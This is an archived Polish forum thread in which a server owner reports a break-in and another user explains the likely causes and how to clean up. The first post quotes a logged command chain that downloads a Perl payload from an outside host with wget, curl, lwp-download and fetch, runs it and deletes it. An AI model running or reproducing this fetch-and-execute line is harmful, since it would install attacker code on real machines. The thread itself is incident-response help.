Freesco, NND, CDN, EOS http://forum.freesco.pl/ |
|
Atak http://forum.freesco.pl/viewtopic.php?f=34&t=18920 |
Strona 1 z 1 |
Autor: | idub [ piątek, 27 września 2013, 08:54 ] |
Tytuł: | Atak |
W logach znalazłem niepokojące wpisy. Proszę o pilną pomoc. na serwerze uruchomił się plik z wpisem: Cytuj: wget http://x.toh.info/.x/sys.c;perl sys.c;curl -O http://x.toh.info/.x/sys.c;perl sys.c;lwp-download http://x.toh.info/.x/sys.c;perl sys.c;fetch http://x.toh.info/.x/sys.c;perl sys.c;rm -rf sys cd "`echo -e '\0057'`" logi oraz zawartość plików: http://www.budicom.com/atak proszę o pilną pomoc gdzie to się inicjuje i jak wykasować , zabezpieczyć. |
Autor: | Maciek [ piątek, 27 września 2013, 09:19 ] |
Tytuł: | Re: Atak |
Zaliczyłeś włamanie. Dwa skrypty to efekt tego włamania. Włamywacz uzyskał dostęp do shella, warto sprawdzić, czyje są te pliki. Włamanie mogła nastąpić przez dziurę w php (np. przestarzały phpMyAdmin wystawiony na świat), przez atak słownikowy na ssh (zdobycie uprawnień usera lub roota). Jedynym bezpiecznym sposobem jest reinstalacja serwera. A doraźnie - analiza plików i katalogów /tmp /var/tmp, plików crona, czy czasem nie dopisano czegoś, sprawdzenie a najlepiej usunięcie plików php i sprawdzenie procesów uruchomionych po starcie. |
Strona 1 z 1 | Strefa czasowa UTC+2godz. |
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/ |